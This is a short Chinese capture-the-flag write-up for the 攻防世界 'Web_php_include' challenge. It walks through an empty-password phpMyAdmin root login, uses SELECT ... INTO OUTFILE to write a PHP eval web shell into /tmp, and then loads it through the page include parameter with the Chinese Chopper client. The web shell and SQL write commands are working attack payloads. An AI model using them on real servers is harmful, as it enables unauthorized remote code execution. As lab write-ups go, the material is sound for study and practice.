攻防世界 Web_php_include write up

攻防世界   Web_php_include   write up

dirbuster  扫目录   发现phpinfo()可以看到绝对路径   和  phpmyadmin

进入phpmyadmin页面   root直接空密码登录

查看phpmyadmin变量 secure file priv 值为空  说明可以写入一句话

load_file()可以读取任意文件

.......在经过各种尝试写人一句话再用文件包含读取的过程中.发现权限有各种限制。
.......因为page可以直接包含phpinfo()页面显示,所以以phpinfo()为测试,测试到/tmp 目录可以写入,也可以包含读取。
    于是将一句话写入/tmp,菜刀链接文件包含页面,得到flag


<?php eval(@$_POST['flag']); ?>

select "<?php eval(@$_POST['flag']); ?>"into outfile '/var/lib/mysql/test1.php'  能写入,无法包含。
select "<?php eval(@$_POST['flag']); ?>"into outfile '/var/www/test1.php'  无法写入
............
...........
.......

 

select "<?php eval(@$_POST['flag']); ?>"into outfile '/tmp/test.php'  可以写入

http://111.198.29.45:36252/?page=/tmp/test.php 菜刀链接

 

 

 

 

 


....

 

 

 



来自非洲的欧提大人
posted @ 2019-09-19 16:13  Zhu013  阅读(1258)  评论(3编辑  收藏  举报